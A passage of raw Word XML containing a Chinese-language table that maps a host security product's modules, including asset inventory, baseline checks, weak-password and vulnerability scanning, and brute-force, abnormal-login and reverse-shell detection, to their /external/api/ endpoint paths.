              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="101404CD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="221CD48B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - 计划任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4712A719" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>计划任务扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31A13250" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/task</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E149B58" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B08E8DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - 环境变量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FDA4F8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>环境变量扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="052B02BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/env</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6FF62E18" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57986FE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>资产清点 - 内核模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E09270B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内核模块扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="102B80BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>kernelmodule</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5879CD97" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52533658" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - 安装包</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D58AFE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装包扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E60F3E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/pkg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="611FAC24" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D1108A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - Jar包</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1674738C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Jar包扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C818D8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jar_pkg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="72DB2866" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171BC616" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>合</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>规</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F8AE7C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>基线扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EEA7019" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1684AD61" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CA9CF88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险发现 - Web风险文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="798B859F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web风险文件扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78921035" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>websecurity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>weakfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="609CEB45" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AFC19E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险发现 - 应用风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="347AD7E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用风险扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67B9DE95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="620BC7FF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EFA9A8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险发现 - 系统风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F07B696" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统风险扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15F48E82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C3C35C2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7904795E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险发现 - 对外访问性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB11564" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>对外访问性扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="138E7C1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C5B1BA4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CE7296C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险发现 - 账号风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B2CD4D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>账号风险扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21ED6C29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2233C40D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E4025A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险发现 - Linux弱密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DF0CDDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Linux弱密码扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A163D1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>weakpwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DBCCEA2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F4EEE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险发现 - Windows弱密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D7D0481" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Windows弱密码扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7022AFBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>weakpwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/win</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14F5D0D5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F50091F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险发现 - 安全补丁</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C7AD63C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F798BD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/patch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5644F42A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3559312E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险发现 - Linux漏洞检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39C07539" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Linux漏洞扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="275DD86F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="571C8AFC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E57C0EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险发现 - 漏洞检测作业管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="779143D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Linux漏洞扫描作业管理及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE4D06C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/job</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5608A2C8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D0CD7E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>入侵检测 - 暴力破解</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70C30058" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>暴力破解封停/解封及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F12AEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/detect/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>brutecrack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="479869A8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2459C6F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>入侵检测 - 异常登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23320829" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常登录规则设置及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="516FC2FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/detect/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abnormallogin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="18A3F6AF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D1A34A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>入侵检测 - 反弹shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31622C8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>反弹shell数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E54072C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
